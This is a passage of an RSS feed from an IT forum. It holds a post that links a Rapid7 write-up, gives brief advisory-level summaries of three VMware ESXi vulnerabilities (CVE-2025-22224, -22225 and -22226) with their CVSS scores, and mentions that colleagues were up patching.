I don't directly deal with our ESXi systems at work, but they were up patching systems tonight for this. A few days late <img src="https://dotheneedful.online/forums/images/smilies/smile.png" alt="Smile" title="Smile" class="smilie smilie_1" /> but...NMFP!]]></description>
			<content:encoded><![CDATA[See: <a href="https://www.rapid7.com/blog/post/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/" target="_blank" rel="noopener" class="mycode_url">https://www.rapid7.com/blog/post/2025/03...-products/</a><br />
<ul class="mycode_list"><li>CVE-2025-22224 (<a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" rel="noopener" class="mycode_url">CVSS 9.3</a>): A Time-of-Check Time-of-Use (TOCTOU) vulnerability in VMware ESXi and Workstation that can lead to an out-of-bounds write condition. An attacker with local administrative privileges on a virtual machine could exploit this issue to execute code as the virtual machine's VMX process running on the host.<br />
</li>
<li>CVE-2025-22225 (<a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" rel="noopener" class="mycode_url">CVSS 8.2</a>): An arbitrary write vulnerability in VMware ESXi that allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.<br />
</li>
<li>CVE-2025-22226 (<a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" target="_blank" rel="noopener" class="mycode_url">CVSS 7.1</a>): An information disclosure vulnerability in VMware ESXi, Workstation, and Fusion that arises from an out-of-bounds read in the Host Guest File System (HGFS). An attacker with administrative privileges to a virtual machine could exploit this issue to leak memory from the VMX process.<br />
</li>
</ul>
<br />
I don't directly deal with our ESXi systems at work, but they were up patching systems tonight for this. A few days late <img src="https://dotheneedful.online/forums/images/smilies/smile.png" alt="Smile" title="Smile" class="smilie smilie_1" /> but...NMFP!]]></content:encoded>
		</item>
	</channel>
</rss>